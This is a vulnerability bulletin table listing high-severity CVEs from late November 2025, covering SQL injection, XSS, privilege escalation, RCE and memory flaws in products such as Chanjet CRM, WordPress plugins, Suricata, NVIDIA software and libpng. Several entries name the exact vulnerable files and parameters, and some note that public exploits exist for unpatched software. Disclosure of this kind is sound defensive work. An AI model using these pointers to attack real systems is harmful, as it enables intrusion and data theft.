| Chanjet--CRM | A vulnerability has been found in Chanjet CRM up to 20251106. The impacted element is an unknown function of the file /tools/upgradeattribute.php. The manipulation of the argument gblOrgID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13788 | VDB-333792 \| Chanjet CRM upgradeattribute.php sql injection VDB-333792 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690084 \| Chanjet CRM V1.0 SQL Injection https://github.com/Bellingham-max/CVE/issues/1 |
| code-projects--COVID Tracking System | A vulnerability was detected in code-projects COVID Tracking System 1.0. This issue affects some unknown processing of the file /login.php. The manipulation of the argument code results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2025-11-24 | 7.3 | CVE-2025-13585 | VDB-333349 \| code-projects COVID Tracking System login.php sql injection VDB-333349 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699840 \| code-projects COVID Tracking System V1.0 SQL Injection https://github.com/beamyou/CVE/issues/4 https://code-projects.org/ |
| code-projects--Jonnys Liquor | A security flaw has been discovered in code-projects Jonnys Liquor 1.0. Affected by this issue is some unknown functionality of the file /detail.php of the component GET Parameter Handler. Performing manipulation of the argument Product results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-11-24 | 7.3 | CVE-2025-13582 | VDB-333346 \| code-projects Jonnys Liquor GET Parameter detail.php sql injection VDB-333346 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699554 \| code-projects Jonnys Liquor 1.0 /detail.php SQL injection https://github.com/rassec2/dbcve/issues/5 https://code-projects.org/ |
| code-projects--Library System | A vulnerability has been found in code-projects Library System 1.0. This affects an unknown function of the file /index.php of the component Login. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-24 | 7.3 | CVE-2025-13578 | VDB-333342 \| code-projects Library System Login index.php sql injection VDB-333342 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699536 \| code-projects Library System 1.0 index.php SQL Injection https://github.com/rassec2/dbcve/issues/4 https://code-projects.org/ |
| code-projects--Question Paper Generator | A weakness has been identified in code-projects Question Paper Generator 1.0. This affects an unknown part of the file /signupscript.php of the component POST Parameter Handler. Executing manipulation of the argument Fname can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-11-24 | 7.3 | CVE-2025-13583 | VDB-333347 \| code-projects Question Paper Generator POST Parameter signupscript.php sql injection VDB-333347 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699591 \| code-projects question paper 1.0 /signupscript.php SQL Injection https://github.com/rassec2/dbcve/issues/6 https://code-projects.org/ |
| cursor--cursor | Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution. | 2025-11-26 | 9.8 | CVE-2025-62354 | https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/ |
| Dassault Systèmes--DELMIA Service Process Engineer | A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session. | 2025-11-24 | 8.7 | CVE-2025-10555 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555 |
| Dassault Systèmes--ENOVIA Product Manager | A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session. | 2025-11-24 | 8.7 | CVE-2025-10554 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554 |
| DirectoryThemes--Tiger | The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the 'paypal-submit.php' file not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-27 | 9.8 | CVE-2025-13675 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995 |
| DirectoryThemes--Tiger | The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the plugin allowing a user to update the user role through the $user->set_role() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator. | 2025-11-27 | 8.8 | CVE-2025-13680 | https://www.wordfence.com/threat-intel/vulnerabilities/id/645f60ad-c8e5-47ec-94f1-960de4ef7838?source=cve https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995 |
| Eaton--Eaton Galileo Software | Improper input sanitization in the file archive upload functionality of Eaton Galileo software allows path traversal, which could let an attacker with local access execute unauthorized code or commands. This security issue has been fixed in the latest version of Galileo, which is available on the Eaton download center. | 2025-11-27 | 7.3 | CVE-2025-59890 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1024.pdf |
| Elated Themes--FindAll Listing | The FindAll Listing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.5. This is due to the 'findall_listing_user_registration_additional_params' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can only be exploited if the FindAll Membership plugin is also activated, because user registration is in that plugin. | 2025-11-27 | 9.8 | CVE-2025-13538 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14981949-271c-4f98-a6a1-b00619f1436d?source=cve https://themeforest.net/item/findall-business-directory-theme/24415962 |
| Elated Themes--FindAll Membership | The FindAll Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.4. This is due to the plugin not properly logging in a user with the data that was previously verified through the 'findall_membership_check_facebook_user' and the 'findall_membership_check_google_user' functions. This makes it possible for unauthenticated attackers to log in as administrative users, as long as they have an existing account on the site which can easily be created by default through the temp user functionality, and access to the administrative user's email. | 2025-11-27 | 9.8 | CVE-2025-13539 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a856a96a-68d2-462d-b523-840668980807?source=cve https://themeforest.net/item/findall-business-directory-theme/24415962 |
| factionsecurity--faction | FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction's extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1. | 2025-11-26 | 9.7 | CVE-2025-66022 | https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w https://github.com/factionsecurity/faction/commit/c6389f1c76175b7c1c68d1a87b389311b16c62c3 |
| fugue-project--fugue | Fugue is a unified interface for distributed computing that lets users execute Python, Pandas, and SQL code on Spark, Dask, and Ray with minimal rewrites. In version 0.9.2 and prior, there is a remote code execution vulnerability by pickle deserialization via FlaskRPCServer. The Fugue framework implements an RPC server system for distributed computing operations. In the core functionality of the RPC server implementation, I found that the _decode() function in fugue/rpc/flask.py directly uses cloudpickle.loads() to deserialize data without any sanitization. This creates a remote code execution vulnerability when malicious pickle data is processed by the RPC server. The vulnerability exists in the RPC communication mechanism where the client can send arbitrary serialized Python objects that will be deserialized on the server side, allowing attackers to execute arbitrary code on the victim's machine. This issue has been patched via commit 6f25326. | 2025-11-25 | 8.8 | CVE-2025-62703 | https://github.com/fugue-project/fugue/security/advisories/GHSA-xv5p-fjw5-vrj6 https://github.com/fugue-project/fugue/commit/6f25326779fd1f528198098d6287c5a863176fc0 |
| geoserver--geoserver | GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0. | 2025-11-25 | 8.2 | CVE-2025-58360 | https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525 https://osgeo-org.atlassian.net/browse/GEOS-11682 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.10 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an unauthenticated user to cause a Denial of Service condition by sending specifically crafted requests containing malicious JSON payloads. | 2025-11-26 | 7.5 | CVE-2025-12571 | GitLab Issue #579168 HackerOne Bug Bounty Report #3362239 |
| GL-Inet--GL-AXT1800 | A firmware downgrade vulnerability exists in the OTA Update functionality of GL-Inet GL-AXT1800 4.7.0. A specially crafted .tar file can lead to a firmware downgrade. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. | 2025-11-24 | 8.3 | CVE-2025-44018 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2230 |
| HCL Software--iNotes | HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials. | 2025-11-25 | 8.1 | CVE-2025-0248 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032 |
| Huawei--HarmonyOS | Permission control vulnerability in the memory management module. Impact: Successful exploitation of this vulnerability may affect confidentiality. | 2025-11-28 | 9.3 | CVE-2025-64314 | https://consumer.huawei.com/cn/support/bulletinlaptops/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the Settings module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 8.4 | CVE-2025-58302 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | UAF vulnerability in the screen recording framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 8.4 | CVE-2025-58303 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Permission control vulnerability in the distributed component. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-11-28 | 8 | CVE-2025-58310 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | Vulnerability of improper criterion security check in the call module. Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2025-11-28 | 7.3 | CVE-2025-58308 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Huawei--HarmonyOS | DoS vulnerability in the video-related system service module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-11-28 | 7.3 | CVE-2025-58316 | https://consumer.huawei.com/en/support/bulletin/2025/11/ |
| Janitza--UMG 96-PA | An unauthenticated remote attacker can send a specially crafted Modbus read command to the device which leads to a denial of service. | 2025-11-24 | 7.5 | CVE-2025-41729 | https://certvde.com/de/advisories/VDE-2025-094 |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, a bug in Kiteworks MFT could, under certain circumstances, cause a user's active session not to time out properly after inactivity. This issue has been patched in version 9.1.0. | 2025-11-29 | 7.1 | CVE-2025-53896 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-23h2-3jj8-58hm |
| kiteworks--security-advisories | Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0. | 2025-11-29 | 7.2 | CVE-2025-53899 | https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gx5-vcpp-8cr5 |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. Insufficient input validation and a lack of output escaping in multiple components leads to a cross-site scripting (XSS) vulnerability. | 2025-11-27 | 8.5 | CVE-2025-66359 | https://servicedesk.logpoint.com/hc/en-us/articles/29158899698333-XSS-Vulnerability-due-to-insufficient-input-validation |
| Mattermost--Mattermost | Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost. | 2025-11-27 | 9.9 | CVE-2025-12419 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to verify that the token used during the code exchange originates from the same authentication flow, which allows an authenticated user to perform account takeover via a specially crafted email address used when switching authentication methods and sending a request to the /users/login/sso/code-exchange endpoint. The vulnerability requires ExperimentalEnableAuthenticationTransfer to be enabled (default: enabled) and RequireEmailVerification to be disabled (default: disabled). | 2025-11-27 | 9.9 | CVE-2025-12421 | https://mattermost.com/security-updates |
| mescuwa--entropy-derby | Inside Track / Entropy Derby is a research-grade horse-racing betting engine. Prior to commit 2d38d2f, the VDF-based timelock encryption system fails to enforce sequential delay against the betting operator. Bettors pre-compute the entire Wesolowski VDF and include vdfOutputHex in their encrypted bet ticket, allowing the house to decrypt immediately using fast proof verification instead of expensive VDF evaluation. This issue has been patched via commit 2d38d2f. | 2025-11-25 | 8.7 | CVE-2025-65951 | https://github.com/mescuwa/entropy-derby/security/advisories/GHSA-pm54-f847-w4mh https://github.com/mescuwa/entropy-derby/commit/2d38d2f16bbb3b4240698148f80d8c5202725c77 |
| Microsoft--Azure App Gateway | Out-of-bounds read in Application Gateway allows an unauthorized attacker to elevate privileges over a network. | 2025-11-26 | 9.4 | CVE-2025-64656 | Azure Application Gateway Elevation of Privilege Vulnerability |
| Microsoft--Azure App Gateway | Stack-based buffer overflow in Azure Application Gateway allows an unauthorized attacker to elevate privileges over a network. | 2025-11-26 | 9.8 | CVE-2025-64657 | Azure Application Gateway Elevation of Privilege Vulnerability |
| milmor--Telegram Bot & Channel | The Telegram Bot & Channel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Telegram username in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-25 | 7.2 | CVE-2025-13068 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe4774ee-16f2-478f-92e3-8a7da7b30336?source=cve https://plugins.trac.wordpress.org/browser/telegram-bot/tags/4.1/columns.php#L45 |
| MISP--MISP | app/Controller/EventsController.php in MISP before 2.5.24 has invalid logic in checking for uploaded file validity, related to tmp_name. | 2025-11-28 | 8.2 | CVE-2025-66384 | https://github.com/misp/misp/commit/6867f0d3157a1959154bdad9ddac009dec6a19f5 https://github.com/MISP/MISP/compare/v2.5.23...v2.5.24 |
| n/a--Qualitor | A security flaw has been discovered in Qualitor 8.20/8.24. Affected by this vulnerability is the function eval of the file /html/st/stdeslocamento/request/getResumo.php. Performing manipulation of the argument passageiros results in code injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 7.3 | CVE-2025-13792 | VDB-333796 \| Qualitor getResumo.php eval code injection VDB-333796 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691251 \| Qualitor Qualitor Web 8.20/8.24 Code Injection https://www.youtube.com/watch?v=hU8YbFc6KpI |
| n/a--validator | Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service. | 2025-11-27 | 7.5 | CVE-2025-12758 | https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476 https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e https://github.com/validatorjs/validator.js/pull/2616 |
| Nozomi Networks--Guardian | A Stored Cross-Site Scripting vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated low-privilege user can craft a malicious dashboard containing a JavaScript payload and share it with victim users, or a victim can be socially engineered to import a malicious dashboard template. When the victim views or imports the dashboard, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modifying application data, disrupting application availability, and accessing limited sensitive information. | 2025-11-25 | 7.9 | CVE-2025-40890 | https://security.nozominetworks.com/NN-2025:11-01 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT, where an attacker could use privileged access to gain access to SoC protected areas. A successful exploit of this vulnerability might lead to code execution, information disclosure, data tampering, denial of service, or escalation of privileges. | 2025-11-25 | 9.3 | CVE-2025-33187 | https://nvd.nist.gov/vuln/detail/CVE-2025-33187 https://www.cve.org/CVERecord?id=CVE-2025-33187 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in hardware resources where an attacker could tamper with hardware controls. A successful exploit of this vulnerability might lead to information disclosure, data tampering, or denial of service. | 2025-11-25 | 8 | CVE-2025-33188 | https://nvd.nist.gov/vuln/detail/CVE-2025-33188 https://www.cve.org/CVERecord?id=CVE-2025-33188 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges. | 2025-11-25 | 7.8 | CVE-2025-33189 | https://nvd.nist.gov/vuln/detail/CVE-2025-33189 https://www.cve.org/CVERecord?id=CVE-2025-33189 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--NeMo Agent ToolKit | NVIDIA NeMo Agent Toolkit UI for Web contains a vulnerability in the chat API endpoint where an attacker may cause a Server-Side Request Forgery. A successful exploit of this vulnerability may lead to information disclosure and denial of service. | 2025-11-25 | 7.6 | CVE-2025-33203 | https://nvd.nist.gov/vuln/detail/CVE-2025-33203 https://www.cve.org/CVERecord?id=CVE-2025-33203 https://nvidia.custhelp.com/app/answers/detail/a_id/5726 |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework for all platforms contains a vulnerability in the NLP and LLM components, where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-25 | 7.8 | CVE-2025-33204 | https://nvd.nist.gov/vuln/detail/CVE-2025-33204 https://www.cve.org/CVERecord?id=CVE-2025-33204 https://nvidia.custhelp.com/app/answers/detail/a_id/5729 |
| NVIDIA--NeMo Framework | NVIDIA NeMo framework contains a vulnerability in a predefined variable, where an attacker could cause inclusion of functionality from an untrusted control sphere by use of a predefined variable. A successful exploit of this vulnerability may lead to code execution. | 2025-11-25 | 7.3 | CVE-2025-33205 | https://nvd.nist.gov/vuln/detail/CVE-2025-33205 https://www.cve.org/CVERecord?id=CVE-2025-33205 https://nvidia.custhelp.com/app/answers/detail/a_id/5729 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a single-byte heap over-read when logging the verdict in eve.alert and eve.drop records can lead to crashes. This requires the per-packet alert queue to be filled with alerts and then followed by a pass rule. This issue has been patched in versions 7.0.13 and 8.0.2. To reduce the likelihood of this issue occurring, the alert queue size should be increased (packet-alert-max in suricata.yaml) if verdict logging is enabled. | 2025-11-26 | 7.5 | CVE-2025-64330 | https://github.com/OISF/suricata/security/advisories/GHSA-83v7-gm34-f437 https://github.com/OISF/suricata/commit/482e5eac9218d007adbe2410d6c00173368ce947 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow can occur on large HTTP file transfers if the user has increased the HTTP response body limit and enabled the logging of printable http bodies. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves using default HTTP response body limits and/or disabling http-body-printable logging; body logging is disabled by default. | 2025-11-26 | 7.5 | CVE-2025-64331 | https://github.com/OISF/suricata/security/advisories/GHSA-v32w-j79x-pfj2 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow that causes Suricata to crash can occur if SWF decompression is enabled. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling SWF decompression (swf-decompression in suricata.yaml); it is disabled by default. If swf-decompression must be enabled, set decompress-depth to less than half your stack size. | 2025-11-26 | 7.5 | CVE-2025-64332 | https://github.com/OISF/suricata/security/advisories/GHSA-p32q-7wcp-gv92 https://github.com/OISF/suricata/commit/ad446c9006a77490af51c468aae0ce934f4d2117 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a large HTTP content type, when logged, can cause a stack overflow that crashes Suricata. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves limiting stream.reassembly.depth to less than half the stack size. Increasing the process stack size makes it less likely the bug will trigger. | 2025-11-26 | 7.5 | CVE-2025-64333 | https://github.com/OISF/suricata/security/advisories/GHSA-537h-xxmx-v87m |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, compressed HTTP data can lead to unbounded memory growth during decompression. This issue has been patched in version 8.0.2. A workaround involves disabling LZMA decompression or limiting response-body-limit size. | 2025-11-26 | 7.5 | CVE-2025-64334 | https://github.com/OISF/suricata/security/advisories/GHSA-r5jf-v2gx-gx8w https://github.com/OISF/suricata/commit/00f04daa3a44928dfdd0003cb9735469272c94a1 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, a NULL dereference can occur when the entropy keyword is used in conjunction with base64_data. This issue has been patched in version 8.0.2. A workaround involves disabling rules that use entropy in conjunction with base64_data. | 2025-11-26 | 7.5 | CVE-2025-64335 | https://github.com/OISF/suricata/security/advisories/GHSA-v299-h7p3-q4f2 https://github.com/OISF/suricata/commit/c935f08cd988600fd0a4f828a585b181dd5de012 |
| OISF--suricata | Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, working with large buffers in Lua scripts can lead to a stack overflow. Users of Lua rules and output scripts may be affected when working with large buffers. This includes a rule passing a large buffer to a Lua script. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling Lua rules and output scripts, or making sure limits, such as stream.depth.reassembly and HTTP response body limits (response-body-limit), are set to less than half the stack size. | 2025-11-26 | 7.5 | CVE-2025-64344 | https://github.com/OISF/suricata/security/advisories/GHSA-93fh-cgmc-w3rx https://github.com/OISF/suricata/commit/e13fe6a90dba210a478148c4084f6f5db17c5b5a |
| open-circle--valibot | Valibot helps validate data using a schema. In versions from 0.31.0 to 1.1.0, the EMOJI_REGEX used in the emoji action is vulnerable to a Regular Expression Denial of Service (ReDoS) attack. A short, maliciously crafted string (e.g., <100 characters) can cause the regex engine to consume excessive CPU time (minutes), leading to a Denial of Service (DoS) for the application. This issue has been patched in version 1.2.0. | 2025-11-26 | 7.5 | CVE-2025-66020 | https://github.com/open-circle/valibot/security/advisories/GHSA-vqpr-j7v3-hqw9 https://github.com/open-circle/valibot/commit/cfb799db301a953a0950d5c05a34a3ab121262dc |
| Opto 22--groov View Server | The users endpoint in the groov View API returns a list of all users and associated metadata including their API keys. This endpoint requires an Editor role to access and will display API keys for all users, including Administrators. | 2025-11-26 | 7.6 | CVE-2025-13084 | https://www.opto22.com/support/resources-tools/knowledgebase/kb91325 https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-04 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-329-04.json |
| ov3rkll--ProjectList | The ProjectList plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.3.0. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-25 | 7.2 | CVE-2025-13376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/781c3b84-df80-470e-8bcb-3305a8bbb64a?source=cve https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L27 https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L27 |
| phpface--StreamTube Core | The StreamTube Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 4.78. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited if the 'registration password fields' option is enabled in theme options. | 2025-11-30 | 9.8 | CVE-2025-13615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b812a0d7-99a1-4f61-b78a-78cea6a2ada1?source=cve https://themeforest.net/item/streamtube-responsive-video-wordpress-theme/33821786 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, an out-of-bounds read vulnerability exists in png_image_read_composite when processing palette images with PNG_FLAG_OPTIMIZE_ALPHA enabled. The palette compositing code in png_init_read_transformations incorrectly applies background compositing during premultiplication, violating the invariant component ≤ alpha × 257 required by the simplified PNG API. This issue has been patched in version 1.6.51. | 2025-11-24 | 7.1 | CVE-2025-64720 | https://github.com/pnggroup/libpng/security/advisories/GHSA-hfc7-ph9c-wcww https://github.com/pnggroup/libpng/issues/686 https://github.com/pnggroup/libpng/pull/751 https://github.com/pnggroup/libpng/commit/08da33b4c88cfcd36e5a706558a8d7e0e4773643 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51. | 2025-11-24 | 7.1 | CVE-2025-65018 | https://github.com/pnggroup/libpng/security/advisories/GHSA-7wv6-48j4-hj3g https://github.com/pnggroup/libpng/issues/755 https://github.com/pnggroup/libpng/pull/757 https://github.com/pnggroup/libpng/commit/16b5e3823918840aae65c0a6da57c78a5a496a4d https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea |
| Qode Interactive--Tiare Membership | The Tiare Membership plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.2. This is due to the 'tiare_membership_init_rest_api_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-11-27 | 9.8 | CVE-2025-13540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf01a38-1fba-4c93-b3fa-acfdd5b19410?source=cve https://themeforest.net/item/tiare-wedding-vendor-directory-theme/26589165?s_rank=1 |
| QuantumNous--new-api | New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.9.6, a recently patched SSRF vulnerability has a bypass that defeats the existing security fix and still allows SSRF to occur. Because the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass the existing security measures and successfully reach the intranet. This issue has been patched in version 0.9.6. | 2025-11-24 | 8.5 | CVE-2025-62155 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-9f46-w24h-69w4 |
| Red Hat--Red Hat Enterprise Linux 10 | A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls. | 2025-11-24 | 8.2 | CVE-2025-13609 | https://access.redhat.com/security/cve/CVE-2025-13609 RHBZ#2416761 |
| Red Hat--Red Hat Enterprise Linux 6 | A flaw was found in WebKitGTK and WPE WebKit. This vulnerability allows an out-of-bounds read and integer underflow, leading to a UIProcess crash (DoS) via a crafted payload to the GLib remote inspector server. | 2025-11-25 | 7.5 | CVE-2025-13502 | https://access.redhat.com/security/cve/CVE-2025-13502 RHBZ#2416300 |
| Redhat--Redhat | A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string. | 2025-11-26 | 7.7 | CVE-2025-13601 | https://access.redhat.com/security/cve/CVE-2025-13601 RHBZ#2416741 https://gitlab.gnome.org/GNOME/glib/-/issues/3827 https://gitlab.gnome.org/GNOME/glib/-/merge_requests/4914 |
| ricardoboss--PubNet | PubNet is a self-hosted Dart & Flutter package service. Prior to version 1.1.3, the /api/storage/upload endpoint in PubNet allows unauthenticated users to upload packages as any user by providing arbitrary author-id values. This enables identity spoofing, privilege escalation, and supply chain attacks. This issue has been patched in version 1.1.3. | 2025-11-29 | 9.4 | CVE-2025-65112 | https://github.com/ricardoboss/PubNet/security/advisories/GHSA-pg82-fqrg-q6j5 |
